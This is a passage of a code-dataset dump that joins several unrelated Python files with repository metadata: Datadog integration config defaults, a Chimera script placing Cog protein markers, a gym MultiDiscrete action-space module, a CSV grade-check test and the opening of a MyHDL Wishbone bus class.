] | permissive | Smartling/integrations-core | 794c3822f05c772c7e36fdde8b68c8c3284e71e3 | 79088364600aa8f06ec38500800f3803db77feed | refs/heads/master | 2023-04-15T14:21:50.017308 | 2023-04-11T20:13:26 | 2023-04-11T20:13:26 | 159,552,127 | 0 | 1 | BSD-3-Clause | 2023-04-07T16:38:06 | 2018-11-28T19:14:55 | Python | UTF-8 | Python | false | false | 4,552 | py | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# This file is autogenerated.
# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:
# ddev -x validate config -s <INTEGRATION_NAME>
# ddev -x validate models -s <INTEGRATION_NAME>
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_proxy(field, value):
return get_default_field_value(field, value)
def shared_service(field, value):
return get_default_field_value(field, value)
def shared_skip_proxy(field, value):
return False
def shared_timeout(field, value):
return 10
def instance_allow_redirects(field, value):
return True
def instance_auth_token(field, value):
return get_default_field_value(field, value)
def instance_auth_type(field, value):
return 'basic'
def instance_aws_host(field, value):
return get_default_field_value(field, value)
def instance_aws_region(field, value):
return get_default_field_value(field, value)
def instance_aws_service(field, value):
return get_default_field_value(field, value)
def instance_connect_timeout(field, value):
return get_default_field_value(field, value)
def instance_disable_generic_tags(field, value):
return False
def instance_disable_legacy_cluster_tag(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_enable_query_name_tag(field, value):
return False
def instance_executor_level_metrics(field, value):
return False
def instance_extra_headers(field, value):
return get_default_field_value(field, value)
def instance_headers(field, value):
return get_default_field_value(field, value)
def instance_kerberos_auth(field, value):
return 'disabled'
def instance_kerberos_cache(field, value):
return get_default_field_value(field, value)
def instance_kerberos_delegate(field, value):
return False
def instance_kerberos_force_initiate(field, value):
return False
def instance_kerberos_hostname(field, value):
return get_default_field_value(field, value)
def instance_kerberos_keytab(field, value):
return get_default_field_value(field, value)
def instance_kerberos_principal(field, value):
return get_default_field_value(field, value)
def instance_log_requests(field, value):
return False
def instance_metric_patterns(field, value):
return get_default_field_value(field, value)
def instance_metricsservlet_path(field, value):
return '/metrics/json'
def instance_min_collection_interval(field, value):
return 15
def instance_ntlm_domain(field, value):
return get_default_field_value(field, value)
def instance_password(field, value):
return get_default_field_value(field, value)
def instance_persist_connections(field, value):
return False
def instance_proxy(field, value):
return get_default_field_value(field, value)
def instance_read_timeout(field, value):
return get_default_field_value(field, value)
def instance_request_size(field, value):
return 16
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_skip_proxy(field, value):
return False
def instance_spark_cluster_mode(field, value):
return 'spark_yarn_mode'
def instance_spark_pre_20_mode(field, value):
return False
def instance_spark_proxy_enabled(field, value):
return False
def instance_spark_ui_ports(field, value):
return get_default_field_value(field, value)
def instance_streaming_metrics(field, value):
return True
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 10
def instance_tls_ca_cert(field, value):
return get_default_field_value(field, value)
def instance_tls_cert(field, value):
return get_default_field_value(field, value)
def instance_tls_ignore_warning(field, value):
return False
def instance_tls_private_key(field, value):
return get_default_field_value(field, value)
def instance_tls_protocols_allowed(field, value):
return get_default_field_value(field, value)
def instance_tls_use_host_header(field, value):
return False
def instance_tls_verify(field, value):
return True
def instance_use_legacy_auth_encoding(field, value):
return True
def instance_username(field, value):
return get_default_field_value(field, value)
| [
"noreply@github.com"
] | Smartling.noreply@github.com |
1b41f116c60d3c8d155ed5e0725cee3fe36d6003 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_10979.py | 047db6f3b4fa315907783783e7952cbd8d5c97a1 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,841 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((472.606, 446.682, 470.856), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((516.31, 394.95, 487.065), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((572.657, 340.907, 508.949), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((604.141, 475.395, 499.212), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((669.213, 182.358, 565.998), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((501.799, 410.933, 475.449), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((500.779, 411.934, 474.57), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((483.637, 410.327, 452.123), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((482.322, 410.341, 423.969), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((504.37, 424.589, 413.88), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((531.597, 424.802, 407.089), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((521.047, 409.602, 385.431), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((476.39, 422.347, 481.528), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((556.118, 393.695, 285.889), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((626.632, 238.367, 394.303), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((626.632, 238.367, 394.303), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((619.014, 260.531, 411.913), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((608.666, 282.727, 427.453), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((594.318, 304.021, 440.93), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((574.49, 321.374, 452.927), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((550.53, 336.029, 460.177), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((526.271, 351.421, 463.61), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((687.527, 305.769, 267.106), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((361.666, 402.873, 657.674), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((530.413, 323.206, 494.803), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((530.413, 323.206, 494.803), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((535.713, 341.858, 515.775), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((554.804, 355.738, 531.501), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((579.671, 370.046, 524.486), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((514.22, 474.272, 501.131), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((654.362, 272.069, 543.897), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((522.246, 421.449, 497.816), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((522.325, 421.657, 497.917), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((528.926, 448.925, 493.7), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((525.49, 443.617, 466.579), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((528.938, 421.778, 449.96), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((519.183, 399.955, 435.926), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((507.757, 390.165, 412.546), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((493.832, 390.261, 388.571), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((464.363, 348.833, 458.48), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((526.866, 432.712, 320.545), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((472.52, 348.796, 503.932), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((495.729, 359.289, 506.679), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((545.111, 383.885, 515.731), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((596.625, 409.986, 525.826), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((550.694, 472.176, 554.058), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((700.631, 400.298, 519.022), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((560.029, 441.292, 471.093), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((558.982, 423.595, 493.055), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((563.998, 411.171, 518.186), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((564.813, 394.385, 541.735), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((565.328, 370.395, 558.742), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((559.514, 341.645, 563.983), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((508.2, 381.965, 516.924), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((604.056, 290.983, 611.756), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
a27e6fda0829bcf2949b2f4b94f7d4b701045abb | 1ec1e418fc5c9aac055c9218f1074332adf1e720 | /rand_param_envs/gym/spaces/multi_discrete.py | ed68170ee4f98ee8e0c3e89670daccd81b829023 | [] | no_license | CHEN-yongquan/mier_public | 344e34137343aa564b261c7125edac3b3ff10eb0 | af56fa84811dc7a697feb1b9dff01836d2148810 | refs/heads/master | 2022-10-15T13:21:35.198458 | 2020-06-12T08:22:16 | 2020-06-12T08:22:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,827 | py | import numpy as np
from rand_param_envs import gym
from rand_param_envs.gym.spaces import prng, Discrete, Box
from rand_param_envs.gym.error import Error
class MultiDiscrete(gym.Space):
    """
    - The multi-discrete action space consists of a series of discrete action spaces with different parameters
    - It can be adapted to both a Discrete action space or a continuous (Box) action space
    - It is useful to represent game controllers or keyboards where each key can be represented as a discrete action space
    - It is parametrized by passing an array of arrays containing [min, max] for each discrete action space
       where the discrete action space can take any integers from `min` to `max` (both inclusive)
    Note: A value of 0 always need to represent the NOOP action.
    e.g. Nintendo Game Controller
    - Can be conceptualized as 3 discrete action spaces:
        1) Arrow Keys: Discrete 5  - NOOP[0], UP[1], RIGHT[2], DOWN[3], LEFT[4]  - params: min: 0, max: 4
        2) Button A:   Discrete 2  - NOOP[0], Pressed[1] - params: min: 0, max: 1
        3) Button B:   Discrete 2  - NOOP[0], Pressed[1] - params: min: 0, max: 1
    - Can be initialized as
        MultiDiscrete([ [0,4], [0,1], [0,1] ])
    """
    def __init__(self, array_of_param_array):
        # Per-dimension [min, max] bounds, split into parallel arrays.
        self.low = np.array([x[0] for x in array_of_param_array])
        self.high = np.array([x[1] for x in array_of_param_array])
        self.num_discrete_space = self.low.shape[0]
    def sample(self):
        """ Returns a array with one sample from each discrete action space """
        # For each row: round(random .* (max - min) + min, 0)
        # floor(u * (high - low + 1) + low) yields a uniform integer in
        # [low, high] inclusive for u in [0, 1).
        random_array = prng.np_random.rand(self.num_discrete_space)
        return [int(x) for x in np.floor(np.multiply((self.high - self.low + 1.), random_array) + self.low)]
    def contains(self, x):
        # x must have one entry per sub-space, each within its bounds.
        return len(x) == self.num_discrete_space and (np.array(x) >= self.low).all() and (
            np.array(x) <= self.high).all()
    @property
    def shape(self):
        # NOTE(review): returns the number of sub-spaces as a plain int,
        # not a tuple like modern gym spaces — callers rely on this.
        return self.num_discrete_space
    def __repr__(self):
        return "MultiDiscrete" + str(self.num_discrete_space)
    def __eq__(self, other):
        # Two spaces are equal iff their per-dimension bounds match.
        return np.array_equal(self.low, other.low) and np.array_equal(self.high, other.high)
# Adapters
class DiscreteToMultiDiscrete(Discrete):
    """
    Adapter that adapts the MultiDiscrete action space to a Discrete action space of any size
    The converted action can be retrieved by calling the adapter with the discrete action
        discrete_to_multi_discrete = DiscreteToMultiDiscrete(multi_discrete)
        discrete_action = discrete_to_multi_discrete.sample()
        multi_discrete_action = discrete_to_multi_discrete(discrete_action)
    It can be initialized using 3 configurations:
    Configuration 1) - DiscreteToMultiDiscrete(multi_discrete)          [2nd param is empty]
        Would adapt to a Discrete action space of size (1 + nb of discrete in MultiDiscrete)
        where
            0   returns NOOP                                [  0,   0,   0, ...]
            1   returns max for the first discrete space    [max,   0,   0, ...]
            2   returns max for the second discrete space   [  0, max,   0, ...]
            etc.
    Configuration 2) - DiscreteToMultiDiscrete(multi_discrete, list_of_discrete) [2nd param is a list]
        Would adapt to a Discrete action space of size (1 + nb of items in list_of_discrete)
        e.g.
        if list_of_discrete = [0, 2]
            0   returns NOOP                                [  0,   0,   0, ...]
            1   returns max for first discrete in list      [max,   0,   0, ...]
            2   returns max for second discrete in list     [  0,   0, max, ...]
            etc.
    Configuration 3) - DiscreteToMultiDiscrete(multi_discrete, discrete_mapping) [2nd param is a dict]
        Would adapt to a Discrete action space of size (nb_keys in discrete_mapping)
        where discrete_mapping is a dictionnary in the format { discrete_key: multi_discrete_mapping }
        e.g. for the Nintendo Game Controller [ [0,4], [0,1], [0,1] ] a possible mapping might be;
        mapping = {
            0:  [0, 0, 0],  # NOOP
            1:  [1, 0, 0],  # Up
            2:  [3, 0, 0],  # Down
            3:  [2, 0, 0],  # Right
            4:  [2, 1, 0],  # Right + A
            5:  [2, 0, 1],  # Right + B
            6:  [2, 1, 1],  # Right + A + B
            7:  [4, 0, 0],  # Left
            8:  [4, 1, 0],  # Left + A
            9:  [4, 0, 1],  # Left + B
            10: [4, 1, 1],  # Left + A + B
            11: [0, 1, 0],  # A only
            12: [0, 0, 1],  # B only,
            13: [0, 1, 1],  # A + B
        }
    """
    def __init__(self, multi_discrete, options=None):
        """Build the discrete->multi-discrete lookup table (``self.mapping``).

        :param multi_discrete: the underlying MultiDiscrete space being adapted
        :param options: None (config 1), list of component indices (config 2),
                        or dict mapping discrete keys to full actions (config 3)
        :raises Error: for a malformed dict mapping or an unknown option type
        """
        assert isinstance(multi_discrete, MultiDiscrete)
        self.multi_discrete = multi_discrete
        self.num_discrete_space = self.multi_discrete.num_discrete_space
        # Config 1: action i+1 maxes out component i; action 0 is NOOP.
        if options is None:
            self.n = self.num_discrete_space + 1            # +1 for NOOP at beginning
            self.mapping = {i: [0] * self.num_discrete_space for i in range(self.n)}
            for i in range(self.num_discrete_space):
                self.mapping[i + 1][i] = self.multi_discrete.high[i]
        # Config 2: like config 1, but only for the listed component indices.
        elif isinstance(options, list):
            assert len(options) <= self.num_discrete_space
            self.n = len(options) + 1                       # +1 for NOOP at beginning
            self.mapping = {i: [0] * self.num_discrete_space for i in range(self.n)}
            for i, disc_num in enumerate(options):
                assert disc_num < self.num_discrete_space
                self.mapping[i + 1][disc_num] = self.multi_discrete.high[disc_num]
        # Config 3: caller supplies the full mapping; keys must be 0..n-1 in
        # order and every mapped action must lie inside the MultiDiscrete space.
        elif isinstance(options, dict):
            self.n = len(options.keys())
            self.mapping = options
            for i, key in enumerate(options.keys()):
                if i != key:
                    raise Error('DiscreteToMultiDiscrete must contain ordered keys. ' \
                                'Item {0} should have a key of "{0}", but key "{1}" found instead.'.format(i, key))
                if not self.multi_discrete.contains(options[key]):
                    raise Error('DiscreteToMultiDiscrete mapping for key {0} is ' \
                                'not contained in the underlying MultiDiscrete action space. ' \
                                'Invalid mapping: {1}'.format(key, options[key]))
        # Unknown parameter provided
        else:
            raise Error('DiscreteToMultiDiscrete - Invalid parameter provided.')

    def __call__(self, discrete_action):
        # Translate a discrete action into its multi-discrete equivalent.
        return self.mapping[discrete_action]
class BoxToMultiDiscrete(Box):
    """
    Adapter that adapts the MultiDiscrete action space to a Box action space
    The converted action can be retrieved by calling the adapter with the box action
        box_to_multi_discrete = BoxToMultiDiscrete(multi_discrete)
        box_action = box_to_multi_discrete.sample()
        multi_discrete_action = box_to_multi_discrete(box_action)
    It can be initialized using 2 configurations:
    Configuration 1) - BoxToMultiDiscrete(multi_discrete)                   [2nd param is empty]
        Would adapt to a Box action space of shape (nb of discrete space, ), with the min-max of
        each Discrete space sets as Box boundaries
        e.g. a MultiDiscrete with parameters [ [0,4], [0,1], [0,1] ], adapted through BoxToMultiDiscrete(multi_discrete)
        would adapt to a Box with parameters low=np.array([0.0, 0.0, 0.0]) high=np.array([4.0, 1.0, 1.0])
        The box action would then be rounded to the nearest integer.
        e.g. [ 2.560453, 0.3523456, 0.674546 ] would be converted to the multi discrete action of [3, 0, 1]
    Configuration 2) - BoxToMultiDiscrete(multi_discrete, list_of_discrete) [2nd param is a list]
        Would adapt to a Box action space of shape (nb of items in list_of_discrete, ), where list_of_discrete
        is the index of the discrete space in the MultiDiscrete space
        e.g. a MultiDiscrete with parameters [ [0,4], [0,1], [0,1] ], adapted through BoxToMultiDiscrete(multi_discrete, [2, 0])
        would adapt to a Box with parameters low=np.array([0.0, 0.0]) high=np.array([1.0, 4.0])
        where
            0.0 = min(discrete space #2), 1.0 = max(discrete space #2)
            0.0 = min(discrete space #0), 4.0 = max(discrete space #0)
        The box action would then be rounded to the nearest integer and mapped to the correct discrete space in multi-discrete.
        e.g. [ 0.7412057, 3.0174142 ] would be converted to the multi discrete action of [3, 0, 1]
        This configuration is useful if you want to ignore certain discrete spaces in the MultiDiscrete space.
    """
    def __init__(self, multi_discrete, options=None):
        """Derive Box bounds from the selected MultiDiscrete components.

        :param multi_discrete: the underlying MultiDiscrete space being adapted
        :param options: None (use every component) or a list of component indices
        :raises Error: if *options* is neither None nor a list
        """
        assert isinstance(multi_discrete, MultiDiscrete)
        self.multi_discrete = multi_discrete
        self.num_discrete_space = self.multi_discrete.num_discrete_space
        if options is None:
            # Default: expose every component of the MultiDiscrete space.
            options = list(range(self.num_discrete_space))
        if not isinstance(options, list):
            raise Error('BoxToMultiDiscrete - Invalid parameter provided.')
        assert len(options) <= self.num_discrete_space
        # Box bounds follow the order given in *options*, not component order.
        self.low = np.array([self.multi_discrete.low[x] for x in options])
        self.high = np.array([self.multi_discrete.high[x] for x in options])
        # Box axis i -> multi-discrete component options[i].
        self.mapping = {i: disc_num for i, disc_num in enumerate(options)}

    def __call__(self, box_action):
        # Unselected components stay at 0 (the NOOP value by convention).
        multi_discrete_action = [0] * self.num_discrete_space
        for i in self.mapping:
            # Round each continuous coordinate to the nearest integer action.
            multi_discrete_action[self.mapping[i]] = int(round(box_action[i], 0))
        return multi_discrete_action
| [
"russellm@berkeley.edu"
] | russellm@berkeley.edu |
2f21c748d4601d3ee19276f8b0c2227ee5efcd28 | 88030f69f438cbeed773d144949c00859a447a52 | /tests/delimited_file_utils/test_delimited_file_utils.py | a0a223117aa766b4de1fbb2e21a722e85ac8d3d9 | [] | no_license | ryanGT/krauss_misc | 05f5845e9915e522cb595b165e81b580019969db | d693dfd19a42ba893a0200630a0f3435711666ee | refs/heads/main | 2022-09-27T22:57:06.738155 | 2022-09-02T14:51:13 | 2022-09-02T14:51:13 | 240,044 | 24 | 16 | null | null | null | null | UTF-8 | Python | false | false | 869 | py | import delimited_file_utils
import glob
from numpy import array
# Sanity-check every exported grade CSV: the header row must match the
# expected labels and the body must contain exactly 9 rows x 7 columns.
files = glob.glob('email_update_grades_test*.csv')
good_labels = array(['Group Name','Content/Progress','Clarity','Writing','Apparent Effort','Overall Grade','Notes'])

passes = []
failures = []

for fname in files:
    table = delimited_file_utils.open_delimited_with_sniffer_and_check(fname)
    header = table[0,:]
    body = table[1:,:]
    header_ok = (header == good_labels).all()
    shape_ok = body.shape == (9,7)
    # A file passes only when both the header and the data shape check out.
    if header_ok and shape_ok:
        passes.append(fname)
    else:
        failures.append(fname)

# Report: silent-ish on success, itemized on failure.
if not failures:
    print('all tests pass')
else:
    print('passes:')
    for fname in passes:
        print(fname)
    print('-----------------------------')
    print('failures:')
    for fname in failures:
        print(fname)
| [
"ryanlists@gmail.com"
] | ryanlists@gmail.com |
83b98e9a60f3fc990acabf8240a72eb92b301126 | 4036b33e022b3ad7e631ee097c6abc6ae7dcc890 | /rhea/system/memmap/wishbone.py | 3f41aa3a374d1a076e7be84aa6575ab4014e427d | [
"MIT"
] | permissive | hgomersall/rhea | 5490e463f492c7375fd40c00a4a9d585eac878c1 | 5c9f0139091df95ea824884ed7c287c5992cf472 | refs/heads/master | 2020-12-25T08:37:06.346994 | 2016-02-25T12:31:02 | 2016-02-25T12:31:02 | 52,529,794 | 1 | 0 | null | 2016-02-25T14:13:35 | 2016-02-25T14:13:35 | null | UTF-8 | Python | false | false | 12,140 | py | #
# Copyright (c) 2014-2015 Christopher L. Felton
#
from __future__ import absolute_import
from myhdl import (Signal, intbv, always, always_seq, always_comb,
instance, instances, concat, enum, now)
from ..glbl import Global
from . import MemoryMapped
from . import Barebone
class Wishbone(MemoryMapped):
    """MyHDL model of a Wishbone memory-mapped bus.

    Holds the bus signals (peripheral/slave point of view), combines the
    peripheral outputs back onto the shared ``dat_o``/``ack_o`` lines, and
    provides testbench transactors (``writetrans``/``readtrans``/``acktrans``)
    plus adapters to/from the generic ``Barebone`` bus.
    """
    name = 'wishbone'

    def __init__(self, glbl=None, data_width=8, address_width=16, name=None):
        """ Wishbone bus object
        Parameters (kwargs):
        --------------------
        :param glbl: system clock and reset
        :param data_width: data bus width
        :param address_width: address bus width
        :param name: name for the bus
        """
        # @todo: ?? not sure if this is how the arguments should be
        #        handled.  Passing args is simple but a little obscure ??
        super(Wishbone, self).__init__(data_width=data_width,
                                       address_width=address_width)
        # Note on Wishbone signal names: since the raw signals are not
        # passed to the controller and peripherals (the interface object
        # is), there is no need for _o and _i suffixes on many signals.
        # The peripheral (slave) point-of-view names are preserved.
        if glbl is not None:
            self.clock = glbl.clock
